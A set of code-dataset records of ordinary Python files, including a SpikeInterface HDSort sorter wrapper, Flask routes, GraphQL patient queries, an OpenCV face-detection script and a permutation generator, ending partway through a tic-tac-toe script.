import HDSortSortingExtractor\n\nPathType = Union[str, Path]\n\n\ndef check_if_installed(hdsort_path: Union[str, None]):\n if hdsort_path is None:\n return False\n assert isinstance(hdsort_path, str)\n\n if hdsort_path.startswith('\"'):\n hdsort_path = hdsort_path[1:-1]\n hdsort_path = str(Path(hdsort_path).absolute())\n if (Path(hdsort_path) / \"+hdsort\").is_dir():\n return True\n else:\n return False\n\n\nclass HDSortSorter(BaseSorter):\n \"\"\"HDSort Sorter object.\"\"\"\n\n sorter_name: str = \"hdsort\"\n compiled_name: str = \"hdsort_compiled\"\n hdsort_path: Union[str, None] = os.getenv(\"HDSORT_PATH\", None)\n requires_locations = False\n _default_params = {\n \"detect_threshold\": 4.2,\n \"detect_sign\": -1, # -1 - 1\n \"filter\": True,\n \"parfor\": True,\n \"freq_min\": 300,\n \"freq_max\": 7000,\n \"max_el_per_group\": 9,\n \"min_el_per_group\": 1,\n \"add_if_nearer_than\": 20,\n \"max_distance_within_group\": 52,\n \"n_pc_dims\": 6,\n \"chunk_size\": 500000,\n \"loop_mode\": \"local_parfor\",\n \"chunk_memory\": \"500M\",\n }\n\n _params_description = {\n \"detect_threshold\": \"Threshold for spike detection\",\n \"detect_sign\": \"Use -1 (negative) or 1 (positive) depending \" \"on the sign of the spikes in the recording\",\n \"filter\": \"Enable or disable filter\",\n \"parfor\": \"If True, the Matlab parfor is used\",\n \"freq_min\": \"High-pass filter cutoff frequency\",\n \"freq_max\": \"Low-pass filter cutoff frequency\",\n \"max_el_per_group\": \"Maximum number of channels per electrode group\",\n \"min_el_per_group\": \"Minimum number of channels per electrode group\",\n \"add_if_nearer_than\": \"Minimum distance to add electrode to an electrode group\",\n \"max_distance_within_group\": \"Maximum distance within an electrode group\",\n \"n_pc_dims\": \"Number of principal components dimensions to perform initial clustering\",\n \"chunk_size\": \"Chunk size in number of frames for template-matching\",\n \"loop_mode\": \"Loop mode: 'loop', 'local_parfor', 'grid' (requires a grid architecture)\",\n \"chunk_memory\": \"Chunk size in Mb for saving to binary format (default 500Mb)\",\n }\n\n sorter_description = \"\"\"HDSort is a template-matching spike sorter designed for high density micro-electrode arrays.\n For more information see https://doi.org/10.1152/jn.00803.2017\"\"\"\n\n installation_mesg = \"\"\"\\nTo use HDSort run:\\n\n >>> git clone https://git.bsse.ethz.ch/hima_public/HDsort.git\n and provide the installation path by setting the HDSORT_PATH\n environment variables or using HDSortSorter.set_hdsort_path().\\n\\n\n\n More information on HDSort at:\n https://git.bsse.ethz.ch/hima_public/HDsort.git\n \"\"\"\n\n handle_multi_segment = False\n\n @classmethod\n def is_installed(cls):\n if cls.check_compiled():\n return True\n return check_if_installed(cls.hdsort_path)\n\n @classmethod\n def get_sorter_version(cls):\n if cls.check_compiled():\n return \"compiled\"\n p = os.getenv(\"HDSORT_PATH\", None)\n if p is None:\n return \"unknown\"\n else:\n with open(str(Path(p) / \"version.txt\"), mode=\"r\", encoding=\"utf8\") as f:\n version = f.readline()\n return version\n\n @staticmethod\n def set_hdsort_path(hdsort_path: PathType):\n HDSortSorter.hdsort_path = str(Path(hdsort_path).absolute())\n try:\n print(\"Setting HDSORT_PATH environment variable for subprocess calls to:\", hdsort_path)\n os.environ[\"HDSORT_PATH\"] = hdsort_path\n except Exception as e:\n print(\"Could not set HDSORT_PATH environment variable:\", e)\n\n @classmethod\n def _check_apply_filter_in_params(cls, params):\n return params[\"filter\"]\n\n @staticmethod\n def _generate_configs_file(sorter_output_folder, params, file_name, file_format):\n P = {}\n\n # preprocess\n P[\"filter\"] = 1.0 if params[\"filter\"] else 0.0\n P[\"parfor\"] = True if params[\"parfor\"] else False\n P[\"hpf\"] = float(params[\"freq_min\"])\n P[\"lpf\"] = float(params[\"freq_max\"])\n\n # leg creationg\n P[\"legs\"] = {\n \"maxElPerGroup\": float(params[\"max_el_per_group\"]),\n \"minElPerGroup\": float(params[\"min_el_per_group\"]),\n \"addIfNearerThan\": float(params[\"add_if_nearer_than\"]), # always add direct neighbors\n \"maxDistanceWithinGroup\": float(params[\"max_distance_within_group\"]),\n }\n\n # spike detection\n P[\"spikeDetection\"] = {\"method\": \"-\", \"thr\": float(params[\"detect_threshold\"])}\n P[\"artefactDetection\"] = {\"use\": 0.0}\n\n # pre-clustering\n P[\"noiseEstimation\"] = {\"minDistFromSpikes\": 80.0}\n P[\"spikeAlignment\"] = {\"initAlignment\": \"-\", \"maxSpikes\": 50000.0} # so many spikes will be clustered\n P[\"featureExtraction\"] = {\"nDims\": float(params[\"n_pc_dims\"])} # 6\n P[\"clustering\"] = {\n \"maxSpikes\": 50000.0, # dont align spikes you dont cluster..\n \"meanShiftBandWidthFactor\": 1.8\n # 'meanShiftBandWidth': sqrt(1.8*6) # todo: check this!\n }\n\n # template matching\n P[\"botm\"] = {\"run\": 0.0, \"Tf\": 75.0, \"cutLeft\": 20.0}\n P[\"spikeCutting\"] = {\"maxSpikes\": 200000000000.0, \"blockwise\": False} # Set this to basically inf\n P[\"templateEstimation\"] = {\"cutLeft\": 10.0, \"Tf\": 55.0, \"maxSpikes\": 100.0}\n\n # merging\n P[\"mergeTemplates\"] = {\n \"merge\": 1.0,\n \"upsampleFactor\": 3.0,\n \"atCorrelation\": 0.93, # DONT SET THIS TOO LOW! USE OTHER ELECTRODES ON FULL FOOTPRINT TO MERGE\n \"ifMaxRelDistSmallerPercent\": 30.0,\n }\n\n # configs\n sort_name = \"hdsort_output\"\n cfgs = {}\n cfgs[\"rawFile\"] = file_name\n cfgs[\"sortingName\"] = sort_name\n cfgs[\"fileFormat\"] = file_format\n cfgs[\"chunkSize\"] = float(params[\"chunk_size\"])\n cfgs[\"loopMode\"] = params[\"loop_mode\"]\n\n data = {\"P\": P, **cfgs}\n import scipy.io\n\n scipy.io.savemat(str(sorter_output_folder / \"configsParams.mat\"), data)\n\n @classmethod\n def _setup_recording(cls, recording, sorter_output_folder, params, verbose):\n #  if isinstance(recording, MaxOneRecordingExtractor):\n if False: # TODO\n # ~ self.params['file_name'] = str(Path(recording._file_path).absolute())\n trace_file_name = str(Path(recording._file_path).absolute())\n # ~ self.params['file_format'] = 'maxone'\n file_format = \"maxone\"\n if verbose:\n print(\"Using MaxOne format directly\")\n else:\n # Generate three files dataset in Mea1k format\n trace_file_name = cls.write_hdsort_input_format(\n recording, str(sorter_output_folder / \"recording.h5\"), chunk_memory=params[\"chunk_memory\"]\n )\n # ~ self.params['file_format'] = 'mea1k'\n file_format = \"mea1k\"\n\n cls._generate_configs_file(sorter_output_folder, params, trace_file_name, file_format)\n\n # store sample rate in a file\n samplerate = recording.get_sampling_frequency()\n samplerate_fname = str(sorter_output_folder / \"samplerate.txt\")\n with open(samplerate_fname, \"w\") as f:\n f.write(\"{}\".format(samplerate))\n\n source_dir = Path(Path(__file__).parent)\n shutil.copy(str(source_dir / \"hdsort_master.m\"), str(sorter_output_folder))\n\n @classmethod\n def _run_from_folder(cls, sorter_output_folder, params, verbose):\n if cls.check_compiled():\n shell_cmd = f\"\"\"\n #!/bin/bash\n {cls.compiled_name} {sorter_output_folder}\n \"\"\"\n else:\n sorter_output_folder = sorter_output_folder.absolute()\n hdsort_path = Path(cls.hdsort_path).absolute()\n\n if \"win\" in sys.platform and sys.platform != \"darwin\":\n disk_move = str(sorter_output_folder)[:2]\n shell_cmd = f\"\"\"\n {disk_move}\n cd {sorter_output_folder}\n matlab -nosplash -wait -r \"{cls.sorter_name}_master('{sorter_output_folder}', '{hdsort_path}')\"\n \"\"\"\n else:\n shell_cmd = f\"\"\"\n #!/bin/bash\n cd \"{sorter_output_folder}\"\n matlab -nosplash -nodisplay -r \"{cls.sorter_name}_master('{sorter_output_folder}', '{hdsort_path}')\"\n \"\"\"\n shell_script = ShellScript(\n shell_cmd,\n script_path=sorter_output_folder / f\"run_{cls.sorter_name}\",\n log_path=sorter_output_folder / f\"{cls.sorter_name}.log\",\n verbose=verbose,\n )\n shell_script.start()\n retcode = shell_script.wait()\n\n if retcode != 0:\n raise Exception(\"HDsort returned a non-zero exit code\")\n\n @classmethod\n def _get_result_from_folder(cls, sorter_output_folder):\n sorter_output_folder = Path(sorter_output_folder)\n sorting = HDSortSortingExtractor(\n file_path=str(sorter_output_folder / \"hdsort_output\" / \"hdsort_output_results.mat\")\n )\n return sorting\n\n @classmethod\n def write_hdsort_input_format(cls, recording, save_path, chunk_memory=\"500M\"):\n try:\n import h5py\n except:\n raise Exception(\"To use HDSort, install h5py: pip install h5py\")\n\n # check if already in write format\n write_file = True\n if hasattr(recording, \"_file_path\"):\n if Path(recording._file_path).suffix in [\".h5\", \".hdf5\"]:\n with h5py.File(recording._file_path, \"r\") as f:\n keys = f.keys()\n if (\n \"version\" in keys\n and \"ephys\" in keys\n and \"mapping\" in keys\n and \"frame_rate\" in keys\n and \"frame_numbers\" in keys\n ):\n if \"sig\" in f[\"ephys\"].keys():\n write_file = False\n trace_file_name = str(Path(recording._file_path).absolute())\n\n if write_file:\n save_path = Path(save_path)\n if save_path.suffix == \"\":\n save_path = Path(str(save_path) + \".h5\")\n mapping_dtype = np.dtype(\n [(\"electrode\", np.int32), (\"x\", np.float64), (\"y\", np.float64), (\"channel\", np.int32)]\n )\n\n locations = recording.get_property(\"location\")\n assert locations is not None, \"'location' property is needed to run HDSort\"\n\n with h5py.File(save_path, \"w\") as f:\n f.create_group(\"ephys\")\n f.create_dataset(\"version\", data=str(20161003))\n ephys = f[\"ephys\"]\n ephys.create_dataset(\"frame_rate\", data=recording.get_sampling_frequency())\n ephys.create_dataset(\"frame_numbers\", data=np.arange(recording.get_num_frames(segment_index=0)))\n # save mapping\n mapping = np.empty(recording.get_num_channels(), dtype=mapping_dtype)\n x = locations[:, 0]\n y = locations[:, 1]\n # channel should be from 0 to num_channel - 1\n for i, ch in enumerate(recording.get_channel_ids()):\n mapping[i] = (ch, x[i], y[i], i)\n ephys.create_dataset(\"mapping\", data=mapping)\n # save traces\n segment_index = 0\n write_to_h5_dataset_format(\n recording,\n dataset_path=\"/ephys/signal\",\n segment_index=0,\n file_handle=f,\n time_axis=1,\n chunk_memory=chunk_memory,\n )\n\n trace_file_name = str(save_path.absolute())\n\n return trace_file_name\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/sorters/external/hdsort.py","file_name":"hdsort.py","file_ext":"py","file_size_in_byte":12446,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"9207067072","text":"from tkinter import S\nfrom app import app\nfrom flask import render_template\nfrom flask import request\nfrom flask import redirect\nfrom flask import url_for\nfrom app import db\nfrom app.models import StartUp\nfrom flask import jsonify\n\n@app.route('/', methods=['GET'])\n@app.route('/home', methods=['GET'])\n@app.route('/dashboard', methods=['GET'])\ndef dashboard_page():\n return render_template('dashboard_page.html')\n\ndef get_startups():\n startups = {}\n searches = StartUp.query.all()[:10]\n for startup in searches:\n startups[startup.id] = {\n 'Startup Name': startup.startup_name,\n 'Startup Description' : startup.startup_description\n }\n return startups\n\n\n@app.route('/startups', methods=['GET'])\ndef startups_page():\n #startups = get_startups()\n page_number = request.args.get('page', 1, type=int)\n #startups = StartUp.query\n results = StartUp.query.paginate(page=page_number, per_page=app.config['RESULTS_PER_PAGE'])\n startups = []\n for result in results.items:\n startups.append(\n {\n 'id': result.id,\n 'startup_name': result.startup_name,\n 'startup_description': result.startup_description,\n 'startup_website': result.startup_website\n }\n )\n return render_template('startups_page.html', startups=startups)\n\n@app.route('/data', methods=['GET'])\ndef data():\n results = {}\n searches = StartUp.query.all()\n for startup in searches:\n results[startup.id] = {\n 'Startup Name': startup.startup_name,\n 'Startup Description' : startup.startup_description\n }\n return jsonify(results)\n\n@app.route('/investors', methods=['GET'])\ndef investor_page():\n return render_template('investors_page.html')\n\n@app.route('/business_hubs', methods=['GET'])\ndef business_hubs_page():\n return render_template('business_hubs_page.html')\n\n","repo_name":"lyleokoth/startup-directory","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15128765759","text":"\nfrom steamctl.argparser import register_command\n\n\nepilog = \"\"\"\\\n\"\"\"\n\n@register_command('assistant', help='Helpful automation', epilog=epilog)\ndef cmd_parser(cp):\n def print_help(*args, **kwargs):\n cp.print_help()\n\n cp.set_defaults(_cmd_func=print_help)\n\n sub_cp = cp.add_subparsers(metavar='',\n dest='subcommand',\n title='List of sub-commands',\n description='',\n )\n\n scp_i = sub_cp.add_parser(\"idle-games\", help=\"Idle up to 32 games for game time\")\n scp_i.set_defaults(_cmd_func=__name__ + '.card_idler:cmd_assistant_idle_games')\n scp_i.add_argument('app_ids', nargs='+', metavar='AppID', type=int, help='App ID(s) to idle')\n\n scp_i = sub_cp.add_parser(\"idle-cards\", help=\"Automatic idling for game cards\")\n scp_i.set_defaults(_cmd_func=__name__ + '.card_idler:cmd_assistant_idle_cards')\n\n scp_i = sub_cp.add_parser(\"discovery-queue\", help=\"Explore a single discovery queue\")\n scp_i.set_defaults(_cmd_func=__name__ + '.discovery_queue:cmd_assistant_discovery_queue')\n","repo_name":"ValvePython/steamctl","sub_path":"steamctl/commands/assistant/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"53"} +{"seq_id":"32360542677","text":"import os\nimport json\n\ndef organize():\n #iterate across the directories in the ./PIE/images/set0*/videos_****\n \n set_path = \"PIE/images/\"\n sets = os.listdir(set_path)\n new_dir = \"processed_images\"\n cfg = open(\"config.json\")\n config = json.load(cfg)\n cfg.close()\n ffmpeg_fps = config['ffmpeg_fps']\n naming = {\n \"01\": \"03\",\n \"02\": \"02\",\n \"03\": \"03\",\n \"04\": \"12\",\n \"05\": \"01\"\n }\n for set_ in sets:\n if set_.startswith('.DS_Store'):\n continue\n path = set_path + set_ + \"/\"\n video_dir = os.listdir(path)\n set_name = set_\n for video in video_dir:\n if video.startswith('.DS_Store'):\n continue\n video_path = path + video + \"/\"\n imgs = os.listdir(video_path)\n if len(imgs) == 0:\n continue\n for img in imgs:\n orig_img = img\n img = int(str(img)[:-4])\n img = int(img * 30.0 / ffmpeg_fps)\n number = set_name[3:5]\n old_dest = video_path + orig_img\n new_dest = \"/s{}_vid00{}_f\".format(number, naming[number])\n os.rename(video_path + \"/\" + orig_img, new_dir + new_dest + str(img) +\".png\")\n\norganize()","repo_name":"justintocco/EquiMOT","sub_path":"data_organizer.py","file_name":"data_organizer.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17717936453","text":"from django.utils import timezone\nimport graphene\nfrom stewardship.models import Patient, PatientForm\nfrom stewardship.graphql.types import PatientObj, PatientDataFormObj\n\n\nclass PatientQuery(graphene.ObjectType):\n patients = graphene.List(PatientObj)\n patient = graphene.Field(PatientObj, id=graphene.ID())\n activePatients = graphene.List(PatientObj)\n todayPatientList = graphene.List(PatientObj)\n\n def resolve_patients(self, info):\n return Patient.objects.all()\n\n def resolve_patient(self, info, **kwargs):\n id = kwargs.get(\"id\")\n return Patient.objects.get(id=id)\n\n def resolve_activePatients(self, info):\n return Patient.objects.filter(active=True)\n\n def resolve_todayPatientList(self, info):\n result = Patient.objects.filter(\n active=True, lastReviewDate__lt=timezone.datetime.now().date()\n )\n result2 = Patient.objects.filter(active=True, lastReviewDate__isnull=True)\n return result | result2\n","repo_name":"anshuman-8/antibiotic-stewardship-server","sub_path":"stewardship/graphql/query/patient.py","file_name":"patient.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5042457496","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport urwid\n\n\nclass MessageDialog(urwid.WidgetWrap):\n \"\"\"Wraps 'urwid.Overlay' to show a message and expects a reaction from the user.\"\"\"\n \n def __init__(self, contents, btns, overlay_size, *, contents_align=\"left\", space_between_btns=2, title=\"\", title_align=\"center\",\n background=urwid.SolidFill(\"#\"), overlay_align=(\"center\", \"middle\"), overlay_min_size=(None, None), left=0, right=0,\n top=0, bottom=0):\n # Message part\n texts = [urwid.Text(content, align=contents_align)\n for content in contents]\n \n # Lower part\n lower_part = [urwid.Divider(\" \"),\n urwid.Columns(btns, dividechars=space_between_btns)]\n \n # frame \n line_box = urwid.LineBox(urwid.Pile(texts + lower_part),\n title=title,\n title_align=title_align)\n \n # Wrap 'urwid.Overlay'\n super().__init__(urwid.Overlay(urwid.Filler(line_box),\n background,\n overlay_align[0],\n overlay_size[0],\n overlay_align[1],\n overlay_size[1],\n min_width=overlay_min_size[0],\n min_height=overlay_min_size[1],\n left=left,\n right=right,\n top=top,\n bottom=bottom))\n ","repo_name":"markqvist/NomadNet","sub_path":"nomadnet/vendor/additional_urwid_widgets/widgets/message_dialog.py","file_name":"message_dialog.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":337,"dataset":"github-code","pt":"53"} +{"seq_id":"31099793410","text":"# -*- coding: utf-8 -*-\n\n# Backtrack, exhaustive search\n# Implementation from the book\n# runtime O(n!) factorial (very slow, similar to exponential)\n\n\n# backtrack-DFS\ndef backtrack_permutations(input):\n solution = [0] * input\n def _backtrack(k):\n #print(k, solution)\n # test first K elements of solution form a complete solution\n if k == input:\n # do something with a complete solution\n print([s+1 for s in solution])\n else:\n # possible candidates for the Kth position of solution\n # implicit tree of all possibilities\n in_perm = set(solution[:k])\n for i in range(input):\n if i not in in_perm:\n solution[k] = i\n _backtrack(k + 1)\n _backtrack(0)\n\n\n# Avoids allocating a set O(n),\n# but does not change the complexity\ndef backtrack_permutations_v2(input):\n solution = {} # treat as ordered set\n def _backtrack(k):\n if k == input:\n print([s+1 for s in solution])\n else:\n for i in range(input):\n if i not in solution:\n solution[i] = None\n _backtrack(k + 1)\n del solution[i]\n _backtrack(0)\n\n\n# set {1, 2, 3}\nbacktrack_permutations(3)\n# [1, 2, 3]\n# [1, 3, 2]\n# [2, 1, 3]\n# [2, 3, 1]\n# [3, 1, 2]\n# [3, 2, 1]\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/07_00_backtrack_permutations.py","file_name":"07_00_backtrack_permutations.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26059085797","text":"import cv2\n\nvideo = cv2.VideoCapture(0)\n\nclassificador_face = cv2.CascadeClassifier('cascades\\haarcascade_frontalface_default.xml')\n\nwhile True:\n conectado , frame = video.read()\n #print(conectado)\n\n frame_cinza = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n faces_detectadas = classificador_face.detectMultiScale(frame_cinza, minSize = (50,50))\n\n # minSize tamanho minimo do quadrado, padrão é (30, 30)\n\n for(x, y, l, a) in faces_detectadas:\n cv2.rectangle(frame,(x , y), (x + l, y + a), (1, 1, 200), 2)\n #(x , y), (x + l, y + a), (1, 1, 255), 2)\n\n cv2.imshow(\"Video\", frame)\n if (cv2.waitKey(1) == ord(\"q\")):\n break\n\nvideo.release()\ncv2.destroyAllWindows()\n","repo_name":"Joaohdss/Deteccao-De-Face-Na-WebCam","sub_path":"Deteccao WebCan/DeteccaoWebCan.py","file_name":"DeteccaoWebCan.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19962171167","text":"import time\nimport os\nimport cv2\nimport numpy as np\nfrom argparse import ArgumentParser\n\nfrom tqdm import tqdm\n\nparser = ArgumentParser()\n\nparser.add_argument(\"--folder\", type=str)\n\nargs = parser.parse_args()\n\n\n#region Detector\nprotoPath = \"deploy.prototxt\"\nmodelPath = \"res10_300x300_ssd_iter_140000.caffemodel\"\n\ndetector = cv2.dnn.readNetFromCaffe(protoPath, modelPath)\n#endregion\n\ndirs = os.listdir(args.folder)\n\nfor inner in tqdm(dirs, desc=\"Dirs\"):\n\n path = os.path.join(args.folder, inner)\n\n if not os.path.isdir(path):\n continue\n\n files = os.listdir(path)\n\n for f in tqdm(files, desc=path):\n\n file = os.path.join(path, f)\n\n image = cv2.imread(file)\n\n imageBlob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300), 1.0 ))\n\n detector.setInput(imageBlob)\n\n detections = detector.forward()\n\n detection = detections[0][0][0]\n\n if detection[2]>=0.80:\n \n (h, w) = image.shape[:2]\n \n box = detection[3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n face = image[startY:endY, startX:endX]\n (fH, fW) = face.shape[:2]\n\n # Minimum size\n if fH>=20 and fW>=20:\n cv2.imwrite(file, face)\n else:\n print(\"Face not found:\", file)\n os.remove(file)\n\n else:\n\n print(\"Face not found:\", file)\n os.remove(file)\n","repo_name":"danigunawan/Face101","sub_path":"face_detection/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13747604152","text":"\r\n# Creator: OmarAfet\r\n# https://profile.satr.codes/OmarAfet/public/overview\r\n# https://github.com/OmarAfet\r\n\r\nimport math\r\ndef array_root(arr: list[float]) -> list[float]:\r\n result = []\r\n for i in arr:\r\n result.append(math.sqrt(i))\r\n \r\n return result","repo_name":"OmarAfet/CoderHub","sub_path":"Python/Medium/المصفوفة الجذرية.py","file_name":"المصفوفة الجذرية.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23285916379","text":"from train.qm9_trainer import train_qm9\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--seed', type=int, default=12345)\narg = parser.parse_args()\nseed = arg.seed\n\nPE_PATH = 'net/0909.pt'\n\ntrain_qm9(seed=seed,\n use_cuda=True,\n limit=-1,\n use_tqdm=False,\n use_pos=False,\n force_save=True,\n position_encoder_path='',\n tag='qm9_nopos@{}'.format(seed)\n )\n\ntrain_qm9(seed=seed,\n use_cuda=True,\n limit=-1,\n use_tqdm=False,\n use_pos=True,\n force_save=True,\n position_encoder_path='',\n tag='qm9_3pos@{}'.format(seed)\n )\n\ntrain_qm9(seed=seed,\n use_cuda=True,\n limit=-1,\n use_tqdm=False,\n use_pos=False,\n force_save=True,\n position_encoder_path=PE_PATH,\n tag='qm9_pos@{}'.format(seed)\n )\n\ntrain_qm9(seed=seed,\n use_cuda=True,\n limit=-1,\n use_tqdm=False,\n use_pos=False,\n force_save=True,\n position_encoder_path=PE_PATH,\n q_only=True,\n tag='qm9_q_only@{}'.format(seed)\n )\n","repo_name":"PKUterran/HamNet","sub_path":"train_qm9.py","file_name":"train_qm9.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"584691608","text":"\"\"\"\nAuthor: Kazybek Askarbek\nDate: 01.08.22\nDescription: File includes raster dataset handler. Current implementation uses rasterio but it could be easily replaced\n\"\"\"\n# third party libraries\nfrom pathlib import Path\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport rasterio as rio\nfrom pydantic import FilePath\nfrom rasterio.crs import CRS\nfrom rasterio.warp import calculate_default_transform\nfrom rasterio.warp import reproject\nfrom rasterio.warp import Resampling\n\n\n# local modules\n# from innofw.core.types import PathLike\n\n\nclass RasterDataset:\n \"\"\"Raster dataset class, handles dataset creation, dynamic band addition and sync of nodata value across bands\n\n Attributes\n ----------\n DN_NODATA: int\n defines values to be used as a replacement of null values in the raster\n DRIVER: str\n sets up the default rasterio driver\n\n Methods\n -------\n get_file_metadata(file_path: FilePath) -> dict\n Parses file with metadata into a dictionary\n add_band(self, band_path: FilePath, band_index: int) -> None\n Adds a new band inplace into raster. Resamples new band if needed\n \"\"\"\n\n DN_NODATA = 0\n DRIVER = \"GTiff\"\n\n def __init__(self, dst_path: Union[str, Path], metadata=None):\n dst_path = Path(dst_path)\n dst_path.parent.mkdir(exist_ok=True, parents=True)\n # if (\n # metadata\n # and \"driver\" not in metadata\n # or (\n # dst_path.suffix in [\".tif\", \".tiff\"]\n # and metadata[\"driver\"] != self.DRIVER\n # )\n # ):\n metadata[\"driver\"] = self.DRIVER\n\n self.ds = rio.open(dst_path, \"w+\", **metadata)\n\n @staticmethod\n def get_file_metadata(file_path: FilePath) -> dict:\n with rio.open(file_path) as f:\n _metadata = f.meta\n return _metadata\n\n @staticmethod\n def get_reprojection_metadata(\n file_path: FilePath,\n target_crs_epsg: Optional[int] = None,\n resolution: Optional[Tuple[int, int]] = None,\n ) -> dict:\n with rio.open(file_path) as f:\n left, bottom, right, top = f.bounds\n\n target_crs = (\n f.crs\n if target_crs_epsg is None\n else CRS.from_epsg(target_crs_epsg)\n )\n\n transform, width, height = calculate_default_transform(\n src_crs=f.crs,\n dst_crs=target_crs,\n width=f.width,\n height=f.height,\n left=left,\n bottom=bottom,\n right=right,\n top=top,\n resolution=resolution,\n )\n metadata = {\n \"crs\": target_crs,\n \"transform\": transform,\n \"width\": width,\n \"height\": height,\n }\n return metadata\n\n def add_band(self, band_path: FilePath, band_index: int) -> None:\n \"\"\"Adds a new band inplace into raster. Resamples new band if needed\"\"\"\n with rio.open(band_path) as image_band:\n if self.ds.crs == image_band.crs:\n self.ds.write(image_band.read(1), band_index)\n else:\n transform, width, height = calculate_default_transform(\n image_band.crs,\n self.ds.crs,\n image_band.width,\n image_band.height,\n *image_band.bounds,\n )\n\n reproject(\n source=rio.band(image_band, 1),\n destination=rio.band(self.ds, band_index),\n src_transform=image_band.transform,\n src_crds=self.ds.crs,\n dst_transform=transform,\n dst_crs=self.ds.crs,\n resampling=Resampling.bilinear,\n )\n\n def close(self) -> None:\n self.sync_bands_nodata()\n self.ds.close()\n\n def sync_bands_nodata(self) -> None:\n pass\n # self._build_nodata_mask()\n\n # for band_index in self.ds.indexes:\n # data = self.ds.read(band_index)\n # data[self.nodata_mask] = self.DN_NODATA\n #\n # self.ds.write(data, indexes=band_index)\n #\n # def _build_nodata_mask(self) -> None:\n # self.nodata_mask = np.zeros((self.ds.count, self.ds.height, self.ds.width), dtype=\"bool\")\n # for i, band_index in enumerate(self.ds.indexes):\n # data = self.ds.read(band_index)\n # # self.nodata_mask[i] = data == -1 # np.logical_or(self.nodata_mask,\n","repo_name":"InnopolisUni/innofw","sub_path":"innofw/utils/data_utils/preprocessing/raster_handler.py","file_name":"raster_handler.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"3416183026","text":"import json\r\nimport cv2\r\nimport os\r\n\r\n\r\ndef make_cropped_label(x, y, w, h, file_name, folder_path):\r\n im = cv2.imread('./input/image1.png')\r\n # y is starting y-axis and y+h is end of y-axis\r\n # x is staring x-axis and x+w is end of x-axis\r\n cropped = im[y:y + h, x:x + w]\r\n # if directory exist then do nothing if not then it will make\r\n os.makedirs(os.path.dirname(folder_path), exist_ok=True)\r\n cv2.imwrite(folder_path + str(y) + '$' + file_name, cropped)\r\n\r\n\r\ndef cropped_images():\r\n with open('input/json/test.json', 'r') as j:\r\n dicts = json.load(j)\r\n json_name = dicts[0]\r\n for box in json_name[\"regions\"]:\r\n box_dict = box['bounding_box']\r\n make_cropped_label(box_dict['x'], box_dict['y'], box_dict['w'], box_dict['h'], json_name.get(\"image_name\"),\r\n './output/croped/')\r\n\r\n\r\ncropped_images()\r\n","repo_name":"testBlueaves/upload-image","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70319828647","text":"\"\"\"empty message\n\nRevision ID: 2a21b5c62227\nRevises: 8018c490c23\nCreate Date: 2014-08-18 20:51:28.993000\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2a21b5c62227'\ndown_revision = '8018c490c23'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('profile_image', sa.String(length=100), nullable=True))\n op.drop_column('user', 'profile_img')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('profile_img', mysql.VARCHAR(length=100), nullable=True))\n op.drop_column('user', 'profile_image')\n ### end Alembic commands ###\n","repo_name":"daye10003/SNS","sub_path":"migrations/versions/2a21b5c62227_.py","file_name":"2a21b5c62227_.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36809105857","text":"Challenge_ID = str\nCP_Score = int\nDepth = int\nDTM = int\nDTZ = int\nGame_ID = str\nHas_Reached_Rate_Limit = bool\nIs_Misconfigured = bool\nLearn = int\nOffer_Draw = bool\nOutcome = str\nPerformance = int\nResign = bool\nSuccess = bool\nUCI_Move = str\nUsername = str\nWeight = float\n","repo_name":"Justaposture/-i019211","sub_path":"aliases.py","file_name":"aliases.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40096993327","text":"from board import Board\nfrom knott import Knott\nfrom tic_tac_toe import Cross\n\n\n\nchoices = 'X0'\nplayer1_choice = input(\"Choose X or 0 \")\nplayer2_choice = 